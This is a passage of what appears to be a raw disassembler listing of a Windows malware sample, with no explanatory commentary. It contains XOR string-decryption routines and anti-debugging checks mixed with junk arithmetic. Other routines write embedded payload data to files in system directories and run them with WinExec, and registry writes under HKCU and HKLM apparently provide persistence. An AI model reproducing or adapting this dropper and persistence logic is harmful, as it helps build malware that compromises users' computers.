loc_4034F8: ; CODE XREF: sub_40349A+AE�j
lea eax, [ebp+var_104]
push eax
call sub_40C818 ; GlobalFindAtomA
mov edi, eax
mov [ebp+var_106], di
lea edi, [ebp+var_112]
lea esi, aJ95e ; " J95E"
mov ecx, 3
rep movsw
cmp [ebp+var_106], 0
jz short loc_40354A
mov ebx, 4056h
add ebx, 1CB6h
movzx eax, [ebp+var_106]
push eax
call sub_40C80C ; GlobalDeleteAtom
call sub_40C794 ; GetProcessHeap
jmp short loc_4034F8
; ---------------------------------------------------------------------------
loc_40354A: ; CODE XREF: sub_40349A+8F�j
pop edi
pop esi
pop ebx
leave
retn
sub_40349A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40354F proc near ; CODE XREF: sub_4035DB+A0�p
; sub_4036BC+34�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 1EAh
push esi
push [ebp+arg_0]
mov eax, dword_43D164
lea eax, ds:40E180h[eax]
push eax
call sub_40CC14
add esp, 0Ch
xor edi, edi
jmp short loc_403597
; ---------------------------------------------------------------------------
loc_40357D: ; CODE XREF: sub_40354F+4A�j
mov eax, dword_43D164
add eax, edi
lea eax, ds:40E180h[eax]
movsx edx, byte ptr [eax]
xor edx, 0D3h
mov [eax], dl
inc edi
loc_403597: ; CODE XREF: sub_40354F+2C�j
cmp edi, esi
jl short loc_40357D
mov [ebp+var_8], 278h
mov eax, dword_43D164
add eax, esi
mov byte ptr ds:dword_40E180[eax], 0
mov edi, dword_43D164
mov eax, edi
add eax, 6
add eax, esi
mov dword_43D164, eax
cmp eax, 0DCEh
jle short loc_4035D1
and dword_43D164, 0
loc_4035D1: ; CODE XREF: sub_40354F+79�j
lea eax, dword_40E180[edi]
pop edi
pop esi
leave
retn
sub_40354F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4035DB proc near ; CODE XREF: sub_4036BC+41�p
var_3F = byte ptr -3Fh
var_38 = byte ptr -38h
var_35 = byte ptr -35h
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 40h
push ebx
push esi
push edi
mov ebx, [ebp+arg_4]
lea edi, [ebp+var_38]
lea esi, byte_43D168
mov ecx, 3
rep movsb
lea edi, [ebp+var_3F]
lea esi, byte_43D16B
mov ecx, 7
rep movsb
call sub_40C7D0 ; GetVersion
mov eax, dword_43D15C
inc eax
push eax
lea eax, [ebp+var_35]
push eax
push [ebp+arg_0]
call sub_40CBC0
add esp, 0Ch
call sub_40C7C4 ; GetTickCount
lea ecx, [ebp+var_35]
or eax, 0FFFFFFFFh
loc_40362D: ; CODE XREF: sub_4035DB+57�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40362D
mov edx, eax
mov [ebp+var_2], dl
call sub_40C764 ; RtlGetLastWin32Error
mov [ebp+var_1], 0
jmp short loc_40365A
; ---------------------------------------------------------------------------
loc_403644: ; CODE XREF: sub_4035DB+89�j
movzx eax, [ebp+var_1]
movzx edx, [ebp+var_2]
sub edx, eax
dec edx
mov al, [ebp+eax+var_35]
mov [ebx+edx], al
add [ebp+var_1], 1
loc_40365A: ; CODE XREF: sub_4035DB+67�j
movzx eax, [ebp+var_1]
movzx edx, [ebp+var_2]
cmp eax, edx
jl short loc_403644
movzx eax, [ebp+var_2]
mov byte ptr [ebx+eax], 0
mov [ebp+var_3], 0
jmp short loc_40368E
; ---------------------------------------------------------------------------
loc_403674: ; CODE XREF: sub_4035DB+C4�j
push 1
push (offset aVgu+4)
call sub_40354F
push eax
push ebx
call sub_40CC74
add esp, 10h
add [ebp+var_3], 1
loc_40368E: ; CODE XREF: sub_4035DB+97�j
movzx eax, [ebp+var_3]
mov edx, 20h
movzx ecx, [ebp+var_2]
sub edx, ecx
cmp eax, edx
jl short loc_403674
call sub_40C854 ; IsDebuggerPresent
push [ebp+arg_8]
push ebx
call sub_40CC74
add esp, 8
call sub_40C7C4 ; GetTickCount
pop edi
pop esi
pop ebx
leave
retn
sub_4035DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4036BC proc near ; CODE XREF: sub_40AA24+694�p
var_3C = byte ptr -3Ch
var_36 = byte ptr -36h
var_4 = word ptr -4
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3Ch
push ebx
push esi
push edi
mov ebx, 65DBh
sub ebx, 2975h
lea edi, [ebp+var_3C]
lea esi, aDmc9 ; "!dmC9"
mov ecx, 3
rep movsw
mov [ebp+var_1], 1Bh
sub [ebp+var_1], 0FBh
push 1
push (offset aVgu+2)
call sub_40354F
push eax
lea edi, [ebp+var_36]
push edi
push [ebp+arg_0]
call sub_4035DB
add esp, 14h
mov [ebp+var_4], 23Ah
sub [ebp+var_4], 4D70h
lea eax, [ebp+var_36]
push eax
call sub_40C800 ; GlobalAddAtomA
mov ebx, 858h
mov eax, ebx
add eax, ebx
mov ebx, eax
pop edi
pop esi
pop ebx
leave
retn
sub_4036BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40372A proc near ; CODE XREF: sub_4037CA+37�p
; .text:0040389B�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_43D180
lea eax, ds:40F6E0h[eax]
push eax
call sub_40CC14
add esp, 0Ch
xor edi, edi
jmp short loc_403768
; ---------------------------------------------------------------------------
loc_403751: ; CODE XREF: sub_40372A+40�j
mov eax, dword_43D180
add eax, edi
lea eax, ds:40F6E0h[eax]
movsx edx, byte ptr [eax]
xor edx, 75h
mov [eax], dl
inc edi
loc_403768: ; CODE XREF: sub_40372A+25�j
cmp edi, esi
jl short loc_403751
mov [ebp+var_4], 2E3h
mov eax, dword_43D180
add eax, esi
mov byte ptr ds:dword_40F6E0[eax], 0
xor edi, edi
mov edi, dword_43D180
inc dword_43D180
mov eax, dword_43D180
add eax, 5
add eax, esi
mov dword_43D180, eax
add dword_43D180, 2
cmp dword_43D180, 0DF6h
jle short loc_4037B9
and dword_43D180, 0
loc_4037B9: ; CODE XREF: sub_40372A+86�j
mov [ebp+var_8], 1Ch
lea eax, dword_40F6E0[edi]
pop edi
pop esi
leave
retn
sub_40372A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4037CA proc near ; CODE XREF: sub_40AA24+728�p
; sub_40AA24+74F�p
var_10A = word ptr -10Ah
var_108 = word ptr -108h
var_106 = word ptr -106h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10Ch
push edi
mov [ebp+var_106], 56C6h
sub [ebp+var_106], 2AE0h
call sub_40C7C4 ; GetTickCount
push [ebp+arg_0]
lea eax, [ebp+var_104]
push eax
call sub_40CC50
push 1
push offset aVgu ; "V"
call sub_40372A
push eax
lea edi, [ebp+var_104]
push edi
call sub_40CC74
mov [ebp+var_108], 14CDh
sub [ebp+var_108], 24h
push [ebp+arg_4]
lea eax, [ebp+var_104]
push eax
call sub_40CC74
add esp, 20h
lea eax, [ebp+var_104]
push eax
call sub_40C800 ; GlobalAddAtomA
mov [ebp+var_10A], 31AAh
movzx eax, [ebp+var_10A]
imul eax, 32E4h
mov [ebp+var_10A], ax
pop edi
leave
retn
sub_4037CA endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 110h
push esi
push edi
lea edi, [ebp-10Dh]
lea esi, a9b7 ; ":9b 7-"
mov ecx, 7
rep movsb
push dword ptr [ebp+8]
lea eax, [ebp-104h]
push eax
call sub_40CC50
call sub_40C854 ; IsDebuggerPresent
push 1
push offset aVgu ; "V"
call sub_40372A
push eax
lea edi, [ebp-104h]
push edi
call sub_40CC74
call sub_40C764 ; RtlGetLastWin32Error
push dword ptr [ebp+0Ch]
lea eax, [ebp-104h]
push eax
call sub_40CC74
add esp, 20h
loc_4038C4: ; CODE XREF: .text:00403908�j
lea eax, [ebp-104h]
push eax
call sub_40C818 ; GlobalFindAtomA
mov edi, eax
mov [ebp-106h], di
cmp word ptr [ebp-106h], 0
jz short loc_40390A
lea edi, [ebp-110h]
lea esi, aUa ; "U"
mov ecx, 3
rep movsb
movzx eax, word ptr [ebp-106h]
push eax
call sub_40C80C ; GlobalDeleteAtom
call sub_40C7C4 ; GetTickCount
jmp short loc_4038C4
; ---------------------------------------------------------------------------
loc_40390A: ; CODE XREF: .text:004038E1�j
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40390E proc near ; CODE XREF: sub_40399B+82�p
; sub_403A5F+58�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 200h
push esi
push [ebp+arg_0]
mov eax, dword_43D198
lea eax, ds:41E9E0h[eax]
push eax
call sub_40CC14
add esp, 0Ch
mov [ebp+var_8], 100h
xor edi, edi
jmp short loc_40395D
; ---------------------------------------------------------------------------
loc_403943: ; CODE XREF: sub_40390E+51�j
mov eax, dword_43D198
add eax, edi
lea eax, ds:41E9E0h[eax]
movsx edx, byte ptr [eax]
xor edx, 0D9h
mov [eax], dl
inc edi
loc_40395D: ; CODE XREF: sub_40390E+33�j
cmp edi, esi
jl short loc_403943
mov eax, dword_43D198
add eax, esi
mov byte ptr ds:dword_41E9E0[eax], 0
xor edi, edi
mov edi, dword_43D198
mov eax, edi
lea eax, [eax+esi+1]
mov dword_43D198, eax
cmp eax, 0DCCh
jle short loc_403991
and dword_43D198, 0
loc_403991: ; CODE XREF: sub_40390E+7A�j
lea eax, dword_41E9E0[edi]
pop edi
pop esi
leave
retn
sub_40390E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40399B proc near ; CODE XREF: sub_403A5F+34�p
; sub_403BE7+139�p ...
var_100B = byte ptr -100Bh
var_1008 = dword ptr -1008h
var_1003 = byte ptr -1003h
var_1000 = byte ptr -1000h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 100Ch
call sub_40C6B8
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
lea edi, [ebp+var_100B]
lea esi, word_4421BE
mov ecx, 3
rep movsb
push 0FFFh
lea eax, [ebp+var_1003]
push eax
call sub_40C7A0 ; GetSystemDirectoryA
call sub_40C7C4 ; GetTickCount
mov [ebp+var_1000], 0
push 0FFFh
lea eax, [ebp+var_1003]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_1008]
push eax
push 0FFFh
lea eax, [ebp+var_1003]
push eax
lea eax, [ebp+var_1003]
push eax
call sub_40C7E8 ; GetVolumeInformationA
call sub_40C740 ; GetCurrentThreadId
push 4
push offset byte_44757F
call sub_40390E
push [ebp+var_1008]
push eax
push ebx
call sub_40CC50
add esp, 14h
call sub_40C740 ; GetCurrentThreadId
and [ebp+var_4], 0
loc_403A3B: ; CODE XREF: sub_40399B+BD�j
mov eax, [ebp+var_4]
mov al, [ebx+eax]
cmp al, 41h
jge short loc_403A51
cmp al, 30h
jle short loc_403A51
mov eax, [ebp+var_4]
add eax, ebx
add byte ptr [eax], 11h
loc_403A51: ; CODE XREF: sub_40399B+A8�j
; sub_40399B+AC�j
inc [ebp+var_4]
cmp [ebp+var_4], 8
jb short loc_403A3B
pop edi
pop esi
pop ebx
leave
retn
sub_40399B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403A5F proc near ; CODE XREF: sub_40AA24+7D2�p
var_28F = byte ptr -28Fh
var_28A = byte ptr -28Ah
var_284 = byte ptr -284h
var_27D = dword ptr -27Dh
var_279 = byte ptr -279h
var_273 = byte ptr -273h
var_26C = byte ptr -26Ch
var_26B = byte ptr -26Bh
var_167 = byte ptr -167h
var_103 = byte ptr -103h
var_102 = word ptr -102h
var_FF = byte ptr -0FFh
push ebp
mov ebp, esp
sub esp, 290h
push ebx
push esi
push edi
call sub_40C734 ; GetCurrentProcessId
lea edi, [ebp+var_26C]
lea esi, byte_4421C1
xor ecx, ecx
inc ecx
rep movsb
mov ebx, 1763h
add ebx, 25D9h
lea eax, [ebp+var_167]
push eax
call sub_40399B
call sub_40C794 ; GetProcessHeap
lea edi, [ebp+var_273]
lea esi, aI? ; "`i/=?<"
mov ecx, 7
rep movsb
push 9
push offset byte_447575
call sub_40390E
lea edi, [ebp+var_167]
push edi
push offset dword_433EE0
push eax
lea edi, [ebp+var_FF]
push edi
call sub_40CC50
lea eax, [ebp+var_FF]
push eax
call sub_40341E
lea edi, [ebp+var_279]
lea esi, aGas6l ; "GS6l"
mov ecx, 3
rep movsw
push 0
push 0
push 2
push 0
push 0
push 40000000h
lea eax, [ebp+var_FF]
push eax
call sub_40C8CC ; CreateFileA
mov ebx, eax
mov eax, dword_4421CF
mov [ebp+var_27D], eax
push 0
lea eax, [ebp+var_284]
push eax
push 3621h
push offset byte_43EB9D
push ebx
call sub_40C944 ; WriteFile
lea edi, [ebp+var_28A]
lea esi, aMt@6 ; "mt@~6"
mov ecx, 3
rep movsw
push ebx
call sub_40C7AC ; CloseHandle
call sub_40C854 ; IsDebuggerPresent
lea edi, [ebp+var_28F]
lea esi, aWGz ; "w-gz"
mov ecx, 5
rep movsb
push 104h
lea eax, [ebp+var_26B]
push eax
push 0
call sub_40C770 ; GetModuleFileNameA
mov [ebp+var_102], 0C80h
sub [ebp+var_102], 4F02h
push 1
push offset byte_447573
call sub_40390E
push eax
lea edi, [ebp+var_FF]
push edi
call sub_40CC74
mov [ebp+var_103], 94h
add [ebp+var_103], 1
lea eax, [ebp+var_26B]
push eax
lea eax, [ebp+var_FF]
push eax
call sub_40CC74
add esp, 38h
call sub_40C734 ; GetCurrentProcessId
push 0
lea eax, [ebp+var_FF]
push eax
call sub_40C938 ; WinExec
call sub_40C734 ; GetCurrentProcessId
pop edi
pop esi
pop ebx
leave
retn
sub_403A5F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403BE7 proc near ; CODE XREF: sub_40AA24+35F�p
var_312 = word ptr -312h
var_310 = dword ptr -310h
var_30C = dword ptr -30Ch
var_308 = dword ptr -308h
var_304 = dword ptr -304h
var_300 = dword ptr -300h
var_2FC = dword ptr -2FCh
var_2F8 = dword ptr -2F8h
var_2F4 = dword ptr -2F4h
var_2F0 = byte ptr -2F0h
var_2E9 = dword ptr -2E9h
var_2E5 = byte ptr -2E5h
var_2DF = dword ptr -2DFh
var_2DB = byte ptr -2DBh
var_2D6 = word ptr -2D6h
var_2D4 = byte ptr -2D4h
var_2CD = byte ptr -2CDh
var_269 = byte ptr -269h
var_205 = byte ptr -205h
var_101 = byte ptr -101h
var_FB = byte ptr -0FBh
var_FA = byte ptr -0FAh
var_F9 = byte ptr -0F9h
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 314h
push ebx
push esi
push edi
call sub_40C854 ; IsDebuggerPresent
lea edi, [ebp+var_2D4]
lea esi, aBdvq ; "!dvq#"
mov ecx, 7
rep movsb
call sub_40C794 ; GetProcessHeap
push 26h
push offset dword_44754C
call sub_40390E
mov [ebp+var_2F4], eax
call sub_40CC38
mov [ebp+var_2F8], eax
call sub_40CC38
mov [ebp+var_2FC], eax
call sub_40CC38
mov [ebp+var_300], eax
call sub_40CC38
mov [ebp+var_304], eax
call sub_40CC38
mov [ebp+var_308], eax
call sub_40CC38
mov [ebp+var_30C], eax
call sub_40CC38
mov [ebp+var_310], eax
call sub_40CC38
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_310]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_30C]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_308]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_304]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_300]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_2FC]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_2F8]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_2F4]
push edi
lea edi, [ebp+var_269]
push edi
call sub_40CC50
call sub_40C7C4 ; GetTickCount
mov ax, word_4421E5
mov [ebp+var_2D6], ax
lea eax, [ebp+var_2CD]
push eax
call sub_40399B
add esp, 34h
call sub_40C764 ; RtlGetLastWin32Error
lea edi, [ebp+var_2DB]
lea esi, aDdbl ; "Ddl"
mov ecx, 5
rep movsb
mov eax, dword_4421EC
mov [ebp+var_2DF], eax
call sub_40CC38
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov edi, eax
add edi, 41h
mov edx, edi
mov [ebp+var_101], dl
call sub_40C7C4 ; GetTickCount
mov [ebp+var_1], 1
jmp short loc_403DAD
; ---------------------------------------------------------------------------
loc_403D7D: ; CODE XREF: sub_403BE7+1CB�j
call sub_40CC38
movzx edi, [ebp+var_1]
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov esi, eax
add esi, 61h
mov edx, esi
mov [ebp+edi+var_101], dl
add [ebp+var_1], 1
loc_403DAD: ; CODE XREF: sub_403BE7+194�j
mov al, [ebp+var_1]
cmp al, 8
jbe short loc_403D7D
mov ebx, 368Ch
mov eax, ebx
add eax, ebx
mov ebx, eax
mov [ebp+var_F9], 0
call sub_40CC38
mov edx, eax
test dl, 1
jnz short loc_403DF5
call sub_40C7C4 ; GetTickCount
mov [ebp+var_FB], 33h
mov [ebp+var_312], 25D6h
inc [ebp+var_312]
mov [ebp+var_FA], 32h
loc_403DF5: ; CODE XREF: sub_403BE7+1E9�j
push 9
push offset word_447542
call sub_40390E
lea edi, [ebp+var_101]
push edi
push offset dword_433EE0
push eax
lea edi, [ebp+var_205]
push edi
call sub_40CC50
lea edi, [ebp+var_2E5]
lea esi, a1dy ; " /1dY"
mov ecx, 3
rep movsw
lea eax, [ebp+var_205]
push eax
call sub_40341E
mov eax, dword_4421F6
mov [ebp+var_2E9], eax
push 0
push 0
push 2
push 0
push 0
push 40000000h
lea eax, [ebp+var_205]
push eax
call sub_40C8CC ; CreateFileA
mov ebx, eax
call sub_40C740 ; GetCurrentThreadId
push [ebp+arg_0]
mov eax, offset aAbcdefghijklmn ; "abcdefghijklmno"
push eax
call sub_40CC50
push 0
lea eax, [ebp+var_2F0]
push eax
push 1A01h
push offset dword_43D19C
push ebx
call sub_40C944 ; WriteFile
push ebx
call sub_40C7AC ; CloseHandle
call sub_40C7D0 ; GetVersion
push 17h
push offset word_44752A
call sub_40390E
lea edi, [ebp+var_269]
push edi
push eax
lea edi, [ebp+var_101]
push edi
call sub_40CC50
call sub_40C764 ; RtlGetLastWin32Error
lea eax, [ebp+var_205]
push eax
push offset byte_447529
lea eax, [ebp+var_101]
push eax
push 80000000h
call sub_403F47
call sub_40C794 ; GetProcessHeap
push 0Eh
push offset aNLF ; ""
call sub_40390E
mov [ebp-314h], eax
push 9
push offset aSiLnN ; ""
call sub_40390E
push eax
mov edi, [ebp-314h]
push edi
lea edi, [ebp+var_101]
push edi
push 80000000h
call sub_403F47
push 45h
push offset aKNoLEfLKNeoOke ; ""...
call sub_40390E
lea edi, [ebp+var_269]
push edi
lea edi, [ebp+var_2CD]
push edi
push eax
push 80000002h
call sub_403F47
add esp, 80h
pop edi
pop esi
pop ebx
leave
retn
sub_403BE7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403F47 proc near ; CODE XREF: sub_403BE7+2EF�p
; sub_403BE7+32B�p ...
var_11 = byte ptr -11h
var_10 = dword ptr -10h
var_9 = byte ptr -9
var_8 = dword ptr -8
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 14h
push esi
push edi
mov edi, [ebp+arg_C]
mov [ebp+var_2], 482Fh
movzx eax, [ebp+var_2]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_2], ax
inc dword_43C230
mov [ebp+var_9], 0C8h
add [ebp+var_9], 59h
and [ebp+var_8], 0
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
push 0
push 0F003Fh
push 0
push 0
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40CB3C ; RegCreateKeyExA
call sub_40C854 ; IsDebuggerPresent
mov ecx, edi
or eax, 0FFFFFFFFh
loc_403FA2: ; CODE XREF: sub_403F47+60�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_403FA2
mov [ebp+var_10], eax
push [ebp+var_10]
push edi
push 1
push 0
push [ebp+arg_8]
push [ebp+var_8]
call sub_40CB6C ; RegSetValueExA
mov [ebp+var_11], 0A1h
add [ebp+var_11], 0D6h
push [ebp+var_8]
call sub_40CB48 ; RegCloseKey
call sub_40C7C4 ; GetTickCount
pop edi
pop esi
leave
retn
sub_403F47 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403FD8 proc near ; CODE XREF: sub_4040AA+A0�p
; sub_4040AA+C0�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_442204
lea eax, ds:411CA0h[eax]
push eax
call sub_40CC14
add esp, 0Ch
mov [ebp+var_4], 278h
xor edi, edi
jmp short loc_404021
sub_403FD8 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_404020
loc_404007: ; CODE XREF: sub_404020+3�j
mov eax, dword_442204
add eax, edi
lea eax, ds:411CA0h[eax] ; DATA XREF: .data:0043F12D�w
; .data:0043F147�w ...
movsx edx, byte ptr [eax]
xor edx, 9Ah
mov [eax], dl
; END OF FUNCTION CHUNK FOR sub_404020
; =============== S U B R O U T I N E =======================================
sub_404020 proc near ; DATA XREF: .data:0043F1FA�o
; .data:0043F210�r
; FUNCTION CHUNK AT 00404007 SIZE 00000019 BYTES
inc edi
loc_404021: ; CODE XREF: sub_403FD8+2D�j
cmp edi, esi
jl short loc_404007 ; DATA XREF: .data:0043F20A�r
mov dword ptr [ebp-8], 2C7h ; DATA XREF: .data:0043F204�r
loc_40402C: ; DATA XREF: .data:loc_43F195�r
; .data:loc_43F1A5�r ...
mov eax, dword_442204
add eax, esi
mov byte ptr ds:dword_411CA0[eax], 0 ; DATA XREF: .data:0043F0A3�w
; .data:0043F0BE�r ...
mov edi, dword_442204 ; DATA XREF: .data:0043F0B8�o
; .data:0043F0C6�o
mov eax, edi
lea eax, [eax+esi+6]
mov dword_442204, eax
cmp eax, 0DB8h
jle short loc_40405A
and dword_442204, 0
loc_40405A: ; CODE XREF: sub_404020+31�j
mov dword ptr [ebp-0Ch], 2EEh
lea eax, dword_411CA0[edi]
pop edi
pop esi
leave
retn
sub_404020 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40406B proc near ; CODE XREF: sub_40AA24+3B9�p
var_1496 = word ptr -1496h
var_1300 = byte ptr -1300h
push ebp
mov ebp, esp
mov eax, 14B4h
call sub_40C6B8
push ebx
push esi
push edi
call sub_40C854 ; IsDebuggerPresent
mov ax, word_442208
mov [ebp+var_1496], ax ; DATA XREF: .data:0043F048�w
call sub_40C7C4 ; DATA XREF: .data:0043F04D�w
; .data:0043F069�w
push 0FFh ; DATA XREF: .data:0043F5A8�w
; .data:0043F5AE�r ...
lea eax, [ebp+var_1300] ; DATA XREF: .data:00440391�r
push eax
push 0
call sub_40C770 ; GetModuleFileNameA
call sub_40C7C4 ; GetTickCount
sub_40406B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4040AA proc near ; DATA XREF: sub_43F624+C�o
mov dword ptr [ebp-1394h], 94h
mov word ptr [ebp-1100h], 47E6h ; DATA XREF: sub_43F624+1C�o
movzx eax, word ptr [ebp-1100h]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp-1100h], ax
lea eax, [ebp-1394h]
push eax
call sub_40C7DC ; GetVersionExA
mov word ptr [ebp-1102h], 21A4h
movzx eax, word ptr [ebp-1102h]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp-1102h], ax
lea edi, [ebp-149Dh]
lea esi, aRMqq ; "`R#MqQ"
mov ecx, 7
rep movsb
cmp dword ptr [ebp-1384h], 2
jnz loc_4041A4
call sub_40C7D0 ; GetVersion
push 0FFh
lea eax, [ebp-0FFh]
push eax
call sub_40C7A0 ; GetSystemDirectoryA
lea edi, [ebp-14B3h]
lea esi, byte_442211
mov ecx, 7
rep movsb
push 0Fh
push offset word_4474BA
call sub_403FD8
lea edi, [ebp-0FFh]
push edi
push eax
lea edi, [ebp-1201h]
push edi
call sub_40CC50
push 0Ah
push offset byte_4474AF
call sub_403FD8
lea edi, [ebp-0FFh]
push edi
push eax
lea edi, [ebp-1494h]
push edi
call sub_40CC50
push 8
push offset word_4474A6
call sub_403FD8
push eax
lea edi, [ebp-0FFh]
push edi
call sub_40CC74
add esp, 38h
jmp loc_404233
; ---------------------------------------------------------------------------
loc_4041A4: ; CODE XREF: sub_4040AA+6A�j
call sub_40C764 ; RtlGetLastWin32Error
push 0FFh
lea eax, [ebp-0FFh]
push eax
call sub_40C7F4 ; GetWindowsDirectoryA
call sub_40C854 ; IsDebuggerPresent
push 0Fh
push offset word_447496
call sub_403FD8
lea edi, [ebp-0FFh]
push edi
push eax
lea edi, [ebp-1201h]
push edi
call sub_40CC50
call sub_40C7D0 ; GetVersion
push 0Eh
push offset byte_447487
call sub_403FD8
lea edi, [ebp-0FFh]
push edi
push eax
lea edi, [ebp-1494h]
push edi
call sub_40CC50
lea edi, [ebp-14AFh]
lea esi, byte_442218
mov ecx, 3
rep movsb
push 0Ch
push offset word_44747A
call sub_403FD8
push eax
lea edi, [ebp-0FFh]
push edi
call sub_40CC74
add esp, 38h
loc_404233: ; CODE XREF: sub_4040AA+F5�j
lea eax, [ebp-1494h]
push eax
call sub_40C704 ; DeleteFileA
call sub_40C794 ; GetProcessHeap
lea edi, [ebp-14A4h]
lea esi, a99a ; "-; 99a"
mov ecx, 7
rep movsb
push 0
push 80h
push 2
push 0
push 0
push 40000000h
lea eax, [ebp-1201h]
push eax
call sub_40C8CC ; CreateFileA
mov ebx, eax
call sub_40C7D0 ; GetVersion
push 39h
push offset dword_447440
call sub_403FD8
lea edi, [ebp-1201h]
push edi
lea edi, [ebp-1300h]
push edi
lea edi, [ebp-1300h]
push edi
push eax
lea edi, [ebp-10FEh]
push edi
call sub_40CC50
add esp, 1Ch
call sub_40C7C4 ; GetTickCount
lea ecx, [ebp-10FEh]
or eax, 0FFFFFFFFh
loc_4042BB: ; CODE XREF: sub_4040AA+216�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4042BB
push 0
lea esi, [ebp-14A8h]
push esi
push eax
lea edi, [ebp-10FEh]
push edi
push ebx
call sub_40C944 ; WriteFile
call sub_40C764 ; RtlGetLastWin32Error
push ebx
call sub_40C7AC ; CloseHandle
mov eax, dword_442222
mov [ebp-14ACh], eax
push 8
push offset aSS ; "麵ٺ"
call sub_403FD8
add esp, 8
lea edi, [ebp-1201h]
push edi
lea edi, [ebp-0FFh]
push edi
push eax
lea edi, [ebp-10FEh]
sub_4040AA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404313 proc near ; DATA XREF: sub_43F725+1E1�o
push edi
call sub_40CC50
add esp, 10h
push 0
lea eax, [ebp-10FEh]
push eax
call sub_40C938 ; WinExec
mov byte ptr [ebp-1395h], 69h
add byte ptr [ebp-1395h], 1
pop edi
pop esi
pop ebx
leave
retn
sub_404313 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 200h
push esi
push dword ptr [ebp+8]
mov eax, dword_442230
lea eax, ds:430C30h[eax]
push eax
call sub_40CC14
add esp, 0Ch
mov dword ptr [ebp-8], 100h
xor edi, edi
jmp short loc_40438C
; ---------------------------------------------------------------------------
loc_404372: ; CODE XREF: .text:0040438E�j
mov eax, dword_442230
add eax, edi
lea eax, ds:430C30h[eax]
movsx edx, byte ptr [eax]
xor edx, 0D9h
mov [eax], dl
inc edi
loc_40438C: ; CODE XREF: .text:00404370�j
cmp edi, esi
jl short loc_404372
mov eax, dword_442230
add eax, esi
mov byte ptr ds:dword_430C30[eax], 0
xor edi, edi
mov edi, dword_442230
mov eax, edi
lea eax, [eax+esi+1]
mov dword_442230, eax
cmp eax, 0DCCh
jle short loc_4043C0
and dword_442230, 0
loc_4043C0: ; CODE XREF: .text:004043B7�j
